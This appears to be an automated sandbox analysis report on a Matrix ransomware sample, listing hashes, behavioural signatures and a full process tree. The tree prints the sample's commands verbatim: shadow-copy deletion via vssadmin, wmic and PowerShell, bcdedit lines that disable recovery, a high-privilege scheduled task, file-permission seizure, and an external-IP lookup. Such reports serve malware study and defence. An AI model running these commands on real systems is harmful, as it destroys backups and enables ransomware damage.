Analysis

  • max time kernel
    151s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220112
  • submitted
    06-03-2022 05:30

General

  • Target

    fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe

  • Size

    2.6MB

  • MD5

    99f0feb589d41c1465846e380d5cdc7d

  • SHA1

    bae92119e9d856e735ed605d2db42680c2dabfc7

  • SHA256

    fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107

  • SHA512

    d8a35f82f4e9d506db76da2ae6ce64b5cc19e28bf74353a07c750ce07547d43ac626d186f5a2f5572ac71d86f2d37868f5837f4b369b8c514c7497b771d8cfef

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://myexternalip.com/raw

Signatures

  • Matrix Ransomware 64 IoCs

    Targeted ransomware with information collection and encryption functionality.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Sets service image path in registry 2 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Modifies file permissions 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 50 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe
    "C:\Users\Admin\AppData\Local\Temp\fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe"
    1⤵
    • Matrix Ransomware
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:3532
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe" "C:\Users\Admin\AppData\Local\Temp\NWms5ZnU.exe"
      2⤵
        PID:2672
      • C:\Users\Admin\AppData\Local\Temp\NWms5ZnU.exe
        "C:\Users\Admin\AppData\Local\Temp\NWms5ZnU.exe" -n
        2⤵
        • Executes dropped EXE
        PID:1816
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\bD2CqHaw.txt"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:656
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:224
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\ByXMTJdC.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1864
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\ByXMTJdC.bmp" /f
          3⤵
          • Sets desktop wallpaper using registry
          PID:3388
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
          3⤵
            PID:3448
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
            3⤵
              PID:1288
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\pj0blc8F.vbs"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:2656
            • C:\Windows\SysWOW64\wscript.exe
              wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\pj0blc8F.vbs"
              3⤵
              • Checks computer location settings
              • Suspicious use of WriteProcessMemory
              PID:1968
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\7eOKxzxt.bat" /sc minute /mo 5 /RL HIGHEST /F
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:3448
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\7eOKxzxt.bat" /sc minute /mo 5 /RL HIGHEST /F
                  5⤵
                  • Creates scheduled task(s)
                  PID:1864
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:2988
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /Run /I /tn DSHCA
                  5⤵
                    PID:984
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EYhrK0ps.bat" "C:\Users\All Users\USOPrivate\UpdateStore\store.db""
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:3568
              • C:\Windows\SysWOW64\attrib.exe
                attrib -R -A -S "C:\Users\All Users\USOPrivate\UpdateStore\store.db"
                3⤵
                • Views/modifies file attributes
                PID:2220
              • C:\Windows\SysWOW64\cacls.exe
                cacls "C:\Users\All Users\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C
                3⤵
                  PID:3500
                • C:\Windows\SysWOW64\takeown.exe
                  takeown /F "C:\Users\All Users\USOPrivate\UpdateStore\store.db"
                  3⤵
                  • Modifies file permissions
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2232
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c wkYsZhe1.exe -accepteula "store.db" -nobanner
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3192
                  • C:\Users\Admin\AppData\Local\Temp\wkYsZhe1.exe
                    wkYsZhe1.exe -accepteula "store.db" -nobanner
                    4⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:3540
                    • C:\Users\Admin\AppData\Local\Temp\wkYsZhe164.exe
                      wkYsZhe1.exe -accepteula "store.db" -nobanner
                      5⤵
                      • Drops file in Drivers directory
                      • Executes dropped EXE
                      • Enumerates connected drives
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious behavior: LoadsDriver
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2052
            • C:\Windows\SYSTEM32\cmd.exe
              C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\7eOKxzxt.bat"
              1⤵
              • Suspicious use of WriteProcessMemory
              PID:3048
              • C:\Windows\system32\vssadmin.exe
                vssadmin Delete Shadows /All /Quiet
                2⤵
                • Interacts with shadow copies
                PID:4048
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic SHADOWCOPY DELETE
                2⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:1988
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Exec Unrestricted try {start-process -FilePath "vssadmin" -ArgumentList "delete","shadows","/all","/quiet" -WindowStyle Hidden} catch {}
                2⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3920
                • C:\Windows\system32\vssadmin.exe
                  "C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet
                  3⤵
                  • Interacts with shadow copies
                  PID:3716
              • C:\Windows\system32\bcdedit.exe
                bcdedit /set {default} recoveryenabled No
                2⤵
                • Modifies boot configuration data using bcdedit
                PID:268
              • C:\Windows\system32\bcdedit.exe
                bcdedit /set {default} bootstatuspolicy ignoreallfailures
                2⤵
                • Modifies boot configuration data using bcdedit
                PID:3976
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Delete /TN DSHCA /F
                2⤵
                  PID:3996
              • C:\Windows\system32\vssvc.exe
                C:\Windows\system32\vssvc.exe
                1⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:1696

              Network

              MITRE ATT&CK Enterprise v6

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • memory/224-138-0x00000000070B0000-0x00000000076D8000-memory.dmp

                Filesize

                6.2MB

              • memory/224-140-0x00000000076E0000-0x0000000007746000-memory.dmp

                Filesize

                408KB

              • memory/224-137-0x0000000006A70000-0x0000000006A71000-memory.dmp

                Filesize

                4KB

              • memory/224-141-0x0000000007750000-0x00000000077B6000-memory.dmp

                Filesize

                408KB

              • memory/224-135-0x0000000073F90000-0x0000000074740000-memory.dmp

                Filesize

                7.7MB

              • memory/224-143-0x00000000093E0000-0x0000000009A5A000-memory.dmp

                Filesize

                6.5MB

              • memory/224-139-0x0000000006DB0000-0x0000000006DD2000-memory.dmp

                Filesize

                136KB

              • memory/224-136-0x0000000006A72000-0x0000000006A73000-memory.dmp

                Filesize

                4KB

              • memory/224-145-0x0000000006A75000-0x0000000006A77000-memory.dmp

                Filesize

                8KB

              • memory/224-144-0x0000000008260000-0x000000000827A000-memory.dmp

                Filesize

                104KB

              • memory/224-142-0x0000000007D80000-0x0000000007D9E000-memory.dmp

                Filesize

                120KB

              • memory/224-134-0x0000000004450000-0x0000000004486000-memory.dmp

                Filesize

                216KB

              • memory/3920-161-0x0000014FB26C0000-0x0000014FB26C2000-memory.dmp

                Filesize

                8KB

              • memory/3920-160-0x00007FFA2C690000-0x00007FFA2D151000-memory.dmp

                Filesize

                10.8MB

              • memory/3920-162-0x0000014FB26C3000-0x0000014FB26C5000-memory.dmp

                Filesize

                8KB

              • memory/3920-159-0x0000014FB2670000-0x0000014FB2692000-memory.dmp

                Filesize

                136KB

              • memory/3920-166-0x0000014FB26C6000-0x0000014FB26C8000-memory.dmp

                Filesize

                8KB